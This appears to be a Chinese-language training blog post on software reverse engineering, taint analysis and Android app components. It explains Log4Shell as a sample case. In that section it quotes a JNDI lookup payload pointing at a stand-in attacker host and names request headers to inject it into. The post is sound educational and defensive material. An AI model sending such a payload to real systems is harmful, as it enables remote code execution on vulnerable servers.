<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 8.1.2">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/7.0.0/css/all.min.css" integrity="sha256-VHqXKFhhMxcpubYf9xiWdCiojEbY9NexQ4jh8AxbvcM=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"silen1-king.github.io","root":"/","images":"/images","scheme":"Mist","darkmode":true,"version":"8.27.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"},"path":"/search.json","localsearch":{"enable":true,"top_n_per_article":1,"unescape":false,"preload":true}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="复旦大学系统软件与安全实验室-新生培训系列">
<meta property="og:type" content="article">
<meta property="og:title" content="软件逆向与漏洞挖掘基础">
<meta property="og:url" content="http://silen1-king.github.io/2026/07/13/%E8%BD%AF%E4%BB%B6%E9%80%86%E5%90%91%E4%B8%8E%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98%E5%9F%BA%E7%A1%80/index.html">
<meta property="og:site_name" content="Silen1Blog">
<meta property="og:description" content="复旦大学系统软件与安全实验室-新生培训系列">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2026-07-12T16:00:00.000Z">
<meta property="article:modified_time" content="2026-07-13T18:11:49.393Z">
<meta property="article:author" content="Silen1-king">
<meta property="article:tag" content="漏洞挖掘">
<meta property="article:tag" content="逆向">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="http://silen1-king.github.io/2026/07/13/%E8%BD%AF%E4%BB%B6%E9%80%86%E5%90%91%E4%B8%8E%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98%E5%9F%BA%E7%A1%80/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"http://silen1-king.github.io/2026/07/13/%E8%BD%AF%E4%BB%B6%E9%80%86%E5%90%91%E4%B8%8E%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98%E5%9F%BA%E7%A1%80/","path":"2026/07/13/软件逆向与漏洞挖掘基础/","title":"软件逆向与漏洞挖掘基础"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>软件逆向与漏洞挖掘基础 | Silen1Blog</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.5.0/search.js" integrity="sha256-xFC6PJ82SL9b3WkGjFavNiA9gm5z6UBxWPiu4CYjptg=" crossorigin="anonymous" defer></script>
<script src="/js/third-party/search/local-search.js" defer></script>







  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Silen1Blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
      <div class="instant-search-container">
        <input type="text" class="instant-search-input" placeholder="搜索博客..." autocomplete="off" />
        <div class="instant-search-results" style="display: none;" popover="auto">
          <ul class="instant-search-results-list"></ul>
        </div>
      </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags<span class="badge">8</span></a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories<span class="badge">2</span></a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives<span class="badge">9</span></a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="Searching..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%A8%8B%E5%BA%8F%E9%80%86%E5%90%91"><span class="nav-number">1.</span> <span class="nav-text">程序逆向</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%80%86%E5%90%91%E6%8A%80%E6%9C%AF%E5%B8%B8%E7%94%A8%E5%B7%A5%E5%85%B7"><span class="nav-number">2.</span> <span class="nav-text">逆向技术常用工具</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%AE%89%E5%85%A8%E5%88%86%E6%9E%90%EF%BC%9A%E4%BB%A3%E7%A0%81%E4%B8%AD%E7%9A%84%E5%85%B3%E9%94%AE%E4%BF%A1%E6%81%AF"><span class="nav-number">3.</span> <span class="nav-text">安全分析：代码中的关键信息</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%A1%88%E4%BE%8B%EF%BC%9ALog4J%E6%BC%8F%E6%B4%9E"><span class="nav-number">3.1.</span> <span class="nav-text">案例：Log4J漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-Source%EF%BC%88%E6%B1%A1%E6%9F%93%E6%BA%90-%E8%BE%93%E5%85%A5%E7%82%B9%EF%BC%89"><span class="nav-number">3.1.1.</span> <span class="nav-text">1. Source（污染源 &#x2F; 输入点）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-Propagate%EF%BC%88%E4%BC%A0%E6%92%AD%E8%B7%AF%E5%BE%84-%E6%95%B0%E6%8D%AE%E6%B5%81%E8%BD%AC%EF%BC%89"><span class="nav-number">3.1.2.</span> <span class="nav-text">2. Propagate（传播路径 &#x2F; 数据流转）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-Sink%EF%BC%88%E6%89%A7%E8%A1%8C%E7%82%B9-%E5%8D%B1%E9%99%A9%E5%87%BD%E6%95%B0%EF%BC%89"><span class="nav-number">3.1.3.</span> <span class="nav-text">3. Sink（执行点 &#x2F; 危险函数）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-Validator%EF%BC%88%E9%AA%8C%E8%AF%81%E5%99%A8%EF%BC%89"><span class="nav-number">3.1.4.</span> <span class="nav-text">4. Validator（验证器）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-Sanitize%EF%BC%88%E5%87%80%E5%8C%96-%E6%B8%85%E6%B4%97%EF%BC%89"><span class="nav-number">3.1.5.</span> <span class="nav-text">5. Sanitize（净化 &#x2F; 清洗）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">3.1.6.</span> <span class="nav-text">总结</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Android"><span class="nav-number">4.</span> <span class="nav-text">Android</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#App%E7%9A%84%E6%9E%84%E6%88%90"><span class="nav-number">4.1.</span> <span class="nav-text">App的构成</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-Activity%EF%BC%88%E6%B4%BB%E5%8A%A8-%E2%80%94%E2%80%94-%E8%B4%9F%E8%B4%A3%E2%80%9C%E9%9C%B2%E8%84%B8%E2%80%9D%EF%BC%89"><span class="nav-number">4.1.1.</span> <span class="nav-text">1. Activity（活动 —— 负责“露脸”）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-Service%EF%BC%88%E6%9C%8D%E5%8A%A1-%E2%80%94%E2%80%94-%E8%B4%9F%E8%B4%A3%E2%80%9C%E5%B9%B2%E8%8B%A6%E5%8A%9B%E2%80%9D%EF%BC%89"><span class="nav-number">4.1.2.</span> <span class="nav-text">2. Service（服务 —— 负责“干苦力”）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-Broadcast-Receiver%EF%BC%88%E5%B9%BF%E6%92%AD%E6%8E%A5%E6%94%B6%E5%99%A8-%E2%80%94%E2%80%94-%E8%B4%9F%E8%B4%A3%E2%80%9C%E5%90%AC%E2%80%9D%EF%BC%89"><span class="nav-number">4.1.3.</span> <span class="nav-text">3. Broadcast Receiver（广播接收器 —— 负责“听”）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-Content-Provider%EF%BC%88%E5%86%85%E5%AE%B9%E6%8F%90%E4%BE%9B%E8%80%85-%E2%80%94%E2%80%94-%E8%B4%9F%E8%B4%A3%E2%80%9C%E5%85%B1%E4%BA%AB%E2%80%9D%EF%BC%89"><span class="nav-number">4.1.4.</span> <span class="nav-text">4. Content Provider（内容提供者 —— 负责“共享”）</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%BE%E4%BE%8B%E5%88%86%E6%9E%90"><span class="nav-number">4.2.</span> <span class="nav-text">举例分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Android-Activity-Lifecycle"><span class="nav-number">4.2.1.</span> <span class="nav-text">[[Android Activity Lifecycle]]</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Android-Service-Lifecycle"><span class="nav-number">4.2.2.</span> <span class="nav-text">[[Android Service Lifecycle]]</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Android-Broadcast-Receiver-Lifecycle"><span class="nav-number">4.2.3.</span> <span class="nav-text">[[Android Broadcast Receiver Lifecycle]]</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Android-Content-Provider-Lifecycle"><span class="nav-number">4.2.4.</span> <span class="nav-text">[[Android Content Provider Lifecycle]]</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Android-App-Development"><span class="nav-number">4.3.</span> <span class="nav-text">Android App Development</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AF%B9%E6%8A%97%E5%88%86%E6%9E%90%E7%9A%84%E6%89%8B%E6%AE%B5-%E9%80%86%E5%90%91%E4%B8%AD%E5%8F%AF%E8%83%BD%E9%81%87%E5%88%B0%E7%9A%84%E4%B8%80%E4%BA%9B%E5%9B%B0%E9%9A%BE"><span class="nav-number">4.3.1.</span> <span class="nav-text">对抗分析的手段-逆向中可能遇到的一些困难</span></a></li></ol></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Silen1-king</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">9</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="http://silen1-king.github.io/2026/07/13/%E8%BD%AF%E4%BB%B6%E9%80%86%E5%90%91%E4%B8%8E%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98%E5%9F%BA%E7%A1%80/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Silen1-king">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Silen1Blog">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="软件逆向与漏洞挖掘基础 | Silen1Blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          软件逆向与漏洞挖掘基础
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2026-07-13 00:00:00" itemprop="dateCreated datePublished" datetime="2026-07-13T00:00:00+08:00">2026-07-13</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2026-07-14 02:11:49" itemprop="dateModified" datetime="2026-07-14T02:11:49+08:00">2026-07-14</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" itemprop="url" rel="index"><span itemprop="name">学习笔记</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>复旦大学系统软件与安全实验室-新生培训系列</p>
<span id="more"></span>

<p>软件逆向——&gt;程序分析+AI——&gt;漏洞挖掘</p>
<h1 id="程序逆向"><a href="#程序逆向" class="headerlink" title="程序逆向"></a>程序逆向</h1><blockquote>
<p>程序逆向是一种分析软件的方式，旨在理解其内部结构、算法及行为。主要用于获取软件的未公开信息。</p>
</blockquote>
<blockquote>
<p>从可运行的程序系统出发，运用解密、反汇编、系统分析、程序理解等技术对软件的结构、流程、算法、代码等进行逆向拆解和分析，推导出软件产品的源代码、设计原理、结构、算法、处理过程、运行方法及相关文档等。</p>
</blockquote>
<p>过程：一般通过逆向编译或动态调试，分析软件的汇编指令和执行流。</p>
<p>源代码——编译——&gt;编译结果——逆向——&gt;伪代码</p>
<p><strong>逆向</strong> 这一步通常分为两个阶段：</p>
<ol>
<li><p><strong>反汇编 (Disassemble)：</strong> 利用工具（如 IDA Pro）将机器码翻译成<strong>汇编语言</strong>（Assembly Code）。汇编语言虽然也是人看的，但非常底层且晦涩。</p>
</li>
<li><p><strong>反编译 (Decompile)：</strong> 利用高级工具（如 IDA 的 Hex-Rays 插件、Ghidra）将汇编语言进一步还原成类似 C 语言那样的高级语言结构。</p>
</li>
</ol>
<h1 id="逆向技术常用工具"><a href="#逆向技术常用工具" class="headerlink" title="逆向技术常用工具"></a>逆向技术常用工具</h1><p><strong>反编译工具</strong>： JEB 、JADX<br><strong>[[插桩分析]]工具</strong>：Frida 、Xposed<br><strong>[[网络流量分析]]</strong>：Burpsuite&#x2F;Fiddler&#x2F;Char les 、Wireshark 、r0capture</p>
<h1 id="安全分析：代码中的关键信息"><a href="#安全分析：代码中的关键信息" class="headerlink" title="安全分析：代码中的关键信息"></a>安全分析：代码中的关键信息</h1><blockquote>
<p>用src，sink等关键代码信息表示漏洞，并在逆向分析过程中关注这些信息作为锚点</p>
</blockquote>
<p>来自<strong>用户的</strong>输入流向数据库<strong>敏感操作</strong><br>　　source　　　　　　　　sink<br>来自<strong>用户的输入</strong> <strong>未经检查地流向</strong>数据库<strong>敏感操作</strong>，且用户输入是<strong>恶意的</strong>，  能<strong>绕过数据校验</strong><br>    source　     propagate　　　　　   sink　　　　　　     validator          sanitizer</p>
<h2 id="案例：Log4J漏洞"><a href="#案例：Log4J漏洞" class="headerlink" title="案例：Log4J漏洞"></a>案例：Log4J漏洞</h2><p>著名的 Log4j 漏洞（CVE-2021-44228，又称 Log4Shell）本质上是一个由于<strong>不安全的反序列化与 JNDI 注入</strong>导致的远程代码执行（RCE）漏洞。</p>
<p>为了深入理解它的运作原理，我们可以引入污点分析（Taint Analysis）<strong>和</strong>数据流分析（Data Flow Analysis）中的核心概念：<code>Source</code>（污染源）、<code>Propagate</code>（传播路径）、<code>Sink</code>（执行点）、<code>Validator</code>（验证器）和 <code>Sanitize</code>（数据净化）。</p>
<p>以下是将这些概念映射到 Log4j 漏洞中的详细解析：</p>
<h3 id="1-Source（污染源-输入点）"><a href="#1-Source（污染源-输入点）" class="headerlink" title="1. Source（污染源 &#x2F; 输入点）"></a>1. Source（污染源 &#x2F; 输入点）</h3><p><strong>概念定义：</strong> Source 是指外部不可信数据进入应用程序的入口点。在安全分析中，所有未经检查的外部输入都被视为“被污染的（Tainted）”。 <strong>Log4j 中的体现：</strong> 攻击者通过构造恶意的 Payload（例如 <code>${jndi:ldap://attacker.com/Exploit}</code>），并将其注入到应用程序会记录到日志中的任何位置。常见的 Source 包括：</p>
<ul>
<li><p><strong>HTTP 请求头：</strong> <code>User-Agent</code>、<code>X-Forwarded-For</code>、<code>Referer</code>。</p>
</li>
<li><p><strong>用户输入表单：</strong> 登录界面的用户名框（如果系统会记录“用户 XXX 登录失败”）。</p>
</li>
<li><p><strong>API 请求参数：</strong> URL 参数或 JSON Body 中的字段。</p>
</li>
</ul>
<p>只要这些带有恶意字符串的数据被传递给 Log4j 的记录方法（如 <code>logger.info(input)</code> 或 <code>logger.error(input)</code>），污染源就成功进入了系统。</p>
<h3 id="2-Propagate（传播路径-数据流转）"><a href="#2-Propagate（传播路径-数据流转）" class="headerlink" title="2. Propagate（传播路径 &#x2F; 数据流转）"></a>2. Propagate（传播路径 &#x2F; 数据流转）</h3><p><strong>概念定义：</strong> Propagate 是指污点数据在应用程序内部函数、方法或组件之间的传递过程。漏洞的形成要求污染数据能够一路畅通无阻地从 Source 传播到 Sink。 <strong>Log4j 中的体现：</strong> 这是 Log4j 漏洞中最复杂、也是最核心的一环（即 Log4j 的字符串替换机制）。传播路径如下：</p>
<ol>
<li><p><strong>应用层调用：</strong> 业务代码调用 <code>logger.error(payload)</code>。</p>
</li>
<li><p><strong>格式化处理：</strong> Log4j 接收到日志内容后，会根据配置（如 <code>PatternLayout</code>）对日志进行格式化。</p>
</li>
<li><p><strong>模式转换（Converter）：</strong> Log4j 发现日志内容中包含特定的占位符，会调用 <code>MessagePatternConverter</code> 处理日志正文。</p>
</li>
<li><p><strong>字符串替换（核心传播）：</strong> 内部调用 <code>StrSubstitutor.substitute()</code>。该方法会递归解析字符串中形如 <code>${prefix:name}</code> 的内容。</p>
</li>
<li><p><strong>路由查找器：</strong> <code>Interpolator</code> 会根据前缀（如 <code>jndi</code>）找到对应的 Lookup 类，在这个漏洞中，数据被传递给了 <code>JndiLookup</code> 类。</p>
</li>
</ol>
<p>在这个过程中，恶意字符串不仅没有被阻断，反而触发了 Log4j 内部的“高级功能”（Lookups），被系统主动解析。</p>
<h3 id="3-Sink（执行点-危险函数）"><a href="#3-Sink（执行点-危险函数）" class="headerlink" title="3. Sink（执行点 &#x2F; 危险函数）"></a>3. Sink（执行点 &#x2F; 危险函数）</h3><p><strong>概念定义：</strong> Sink 是指污点数据最终到达并触发安全问题的敏感函数或 API操作（例如执行系统命令、数据库查询或网络请求）。 <strong>Log4j 中的体现：</strong> Log4j 的 Sink 位于 <code>JndiLookup.lookup()</code> 方法内部。</p>
<ol>
<li><p>当 <code>JndiLookup</code> 接收到被解析出来的字符串（如 <code>ldap://attacker.com/Exploit</code>）后，会直接将其传递给 JNDI（Java Naming and Directory Interface）API。</p>
</li>
<li><p>最终触发的 Java 底层危险函数是 <code>javax.naming.InitialContext.lookup(URI)</code>。</p>
</li>
<li><p><strong>结果：</strong> JNDI API 会向攻击者控制的 LDAP 或 RMI 服务器发起网络请求，下载恶意的 Java Class 文件并在本地 JVM 中实例化（通过反序列化或对象工厂机制），从而执行任意代码（RCE）。</p>
</li>
</ol>
<h3 id="4-Validator（验证器）"><a href="#4-Validator（验证器）" class="headerlink" title="4. Validator（验证器）"></a>4. Validator（验证器）</h3><p><strong>概念定义：</strong> Validator 是指应用程序在数据流转过程中，用于检查数据是否符合预期格式、长度或白名单的安全机制。 <strong>Log4j 中的体现（漏洞发生的原因）：</strong></p>
<ul>
<li><p><strong>漏洞爆发前：</strong> Log4j 在处理 JNDI Lookup 时<strong>完全缺乏 Validator</strong>。它盲目地相信了配置和传入的字符串，不对 JNDI 连接的目标 URL 做任何域名或协议的白名单校验。</p>
</li>
<li><p><strong>修复过程中的体现（Log4j 2.15.0）：</strong> 官方在这个版本中加入了 Validator 机制，限制了 JNDI 只能连接本地的地址（如 <code>localhost</code>），并增加了一系列白名单类检查（只允许基础数据类型），阻断了连接任意外部恶意服务器的路径。</p>
</li>
</ul>
<h3 id="5-Sanitize（净化-清洗）"><a href="#5-Sanitize（净化-清洗）" class="headerlink" title="5. Sanitize（净化 &#x2F; 清洗）"></a>5. Sanitize（净化 &#x2F; 清洗）</h3><p><strong>概念定义：</strong> Sanitize 是指对污点数据进行修改，剥离或转义其中的恶意代码，使其变得安全（例如 XSS 防御中的 HTML 实体转义）。 <strong>Log4j 中的体现（防御与彻底修复）：</strong></p>
<ul>
<li><p><strong>漏洞爆发前：</strong> Log4j 默认开启了 <code>Message Lookups</code> 功能，不对包含 <code>${}</code> 的内容进行任何清洗，直接解析。</p>
</li>
<li><p><strong>临时防御措施：</strong> 早期防御建议将配置改为 <code>%m{nolookups}</code>，这相当于一种隐式的 Sanitize 策略——告诉框架不要把这部分数据当作代码解析，纯粹当作普通文本输出。</p>
</li>
<li><p><strong>彻底修复（Log4j 2.16.0 及以后）：</strong> 官方意识到修补 JNDI 的 Validator 太容易被绕过，于是选择从根本上切断传播路径，<strong>默认完全移除了 Message Lookups 功能</strong>，并最终在 2.17.0 版本中禁用了 JNDI 功能。这保证了无论传入什么恶意占位符，都会被当作纯文本处理（彻底的清洗），不再触发解析。</p>
</li>
</ul>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>如果用一句话概括 Log4j 漏洞的生命周期： 攻击者将恶意载荷投入 <strong>Source</strong>（如 HTTP Header），数据在应用内部触发 Log4j 的字符串解析机制进行 <strong>Propagate</strong>，由于系统缺乏必要的 <strong>Validator</strong>（未限制 JNDI 请求目标）和 <strong>Sanitize</strong>（未禁止日志内容的递归解析），数据最终流入 <strong>Sink</strong>（<code>InitialContext.lookup</code>），导致加载了远程恶意代码，完成了攻击。</p>
<h1 id="Android"><a href="#Android" class="headerlink" title="Android"></a>Android</h1><blockquote>
<p>一款基于Linux内核设计的开源操作系统</p>
</blockquote>
<h2 id="App的构成"><a href="#App的构成" class="headerlink" title="App的构成"></a>App的构成</h2><blockquote>
<p>由各种可任意单独调用的组件构成<br>四大组件+AndroidManifest.xml（配置信息）+Android permissions（访问控制）</p>
</blockquote>
<h3 id="1-Activity（活动-——-负责“露脸”）"><a href="#1-Activity（活动-——-负责“露脸”）" class="headerlink" title="1. Activity（活动 —— 负责“露脸”）"></a>1. Activity（活动 —— 负责“露脸”）</h3><ul>
<li><p><strong>在 App 中：</strong> 就是你创建的每一个可视化的 <code>.iyu</code> 界面。</p>
</li>
<li><p><strong>作用：</strong> 它是与用户直接交互的窗口。所有的控件（按钮、文本等）摆放，以及用户的点击、滑动等操作，都在 Activity 中完成。</p>
</li>
</ul>
<h3 id="2-Service（服务-——-负责“干苦力”）"><a href="#2-Service（服务-——-负责“干苦力”）" class="headerlink" title="2. Service（服务 —— 负责“干苦力”）"></a>2. Service（服务 —— 负责“干苦力”）</h3><ul>
<li><p><strong>在 App 中：</strong> 通常体现为后台任务代码。</p>
</li>
<li><p><strong>作用：</strong> 在用户看不见的后台默默运行。比如 App 退到桌面后，依然在后台播放音乐、下载文件或保持服务器长连接。</p>
</li>
</ul>
<h3 id="3-Broadcast-Receiver（广播接收器-——-负责“听”）"><a href="#3-Broadcast-Receiver（广播接收器-——-负责“听”）" class="headerlink" title="3. Broadcast Receiver（广播接收器 —— 负责“听”）"></a>3. Broadcast Receiver（广播接收器 —— 负责“听”）</h3><ul>
<li><p><strong>在 App 中：</strong> 体现为系统事件的监听代码。</p>
</li>
<li><p><strong>作用：</strong> 就像一个“收音机”。它可以接收系统或其他 App 发出的全局消息，比如监听到“网络断开”、“电量过低”或“收到短信”，然后触发你设定好的逻辑。</p>
</li>
</ul>
<h3 id="4-Content-Provider（内容提供者-——-负责“共享”）"><a href="#4-Content-Provider（内容提供者-——-负责“共享”）" class="headerlink" title="4. Content Provider（内容提供者 —— 负责“共享”）"></a>4. Content Provider（内容提供者 —— 负责“共享”）</h3><ul>
<li><p><strong>在 App 中：</strong> 体现为跨应用的数据读取&#x2F;写入接口。</p>
</li>
<li><p><strong>作用：</strong> 负责不同 App 之间的数据交换。在 App 开发中，你很少会去自己<strong>创建</strong>它，但会经常<strong>调用</strong>它——比如用代码读取系统的通讯录联系人、获取相册图片，本质上就是在使用其他应用的 Content Provider。</p>
</li>
</ul>
<p><strong>一句话总结：</strong> Activity 负责<strong>界面展示</strong>，Service 负责<strong>后台运行</strong>，Broadcast Receiver 负责<strong>监听消息</strong>，Content Provider 负责<strong>数据共享</strong>。</p>
<h2 id="举例分析"><a href="#举例分析" class="headerlink" title="举例分析"></a>举例分析</h2><h3 id="Android-Activity-Lifecycle"><a href="#Android-Activity-Lifecycle" class="headerlink" title="[[Android Activity Lifecycle]]"></a>[[Android Activity Lifecycle]]</h3><p>用三层逻辑就可以轻松记住 Activity 生命周期的核心：</p>
<ul>
<li><p><strong>第一层：生死存亡（创建与销毁）</strong></p>
<ul>
<li><p><code>onCreate()</code>：界面<strong>出生</strong>（加载布局、初始化数据）。</p>
</li>
<li><p><code>onDestroy()</code>：界面<strong>死亡</strong>（被彻底关闭，释放内存）。</p>
</li>
</ul>
</li>
<li><p><strong>第二层：是否可见（显示与隐藏）</strong></p>
<ul>
<li><p><code>onStart()</code>：出现在屏幕上（<strong>看得见</strong>，但还不能交互）。</p>
</li>
<li><p><code>onStop()</code>：退到后台（<strong>完全看不见</strong>）。</p>
</li>
</ul>
</li>
<li><p><strong>第三层：能否交互（聚焦与失焦）</strong></p>
<ul>
<li><p><code>onResume()</code>：来到最前台（<strong>既能看，又能点</strong>，完全霸占屏幕）。</p>
</li>
<li><p><code>onPause()</code>：失去焦点（被其他弹窗挡住或准备退到后台，<strong>能看到一点，但不能点</strong>）。</p>
</li>
</ul>
</li>
</ul>
<p><strong>极简流转路线：</strong> 出生(<code>Create</code>) ➔ 能看(<code>Start</code>) ➔ 能玩(<code>Resume</code>) ➔ 摸不到(<code>Pause</code>) ➔ 看不见(<code>Stop</code>) ➔ 死亡(<code>Destroy</code>)。 <em>(如果从“看不见”又回到了前台，中间插一个复活 <code>Restart</code>)</em></p>
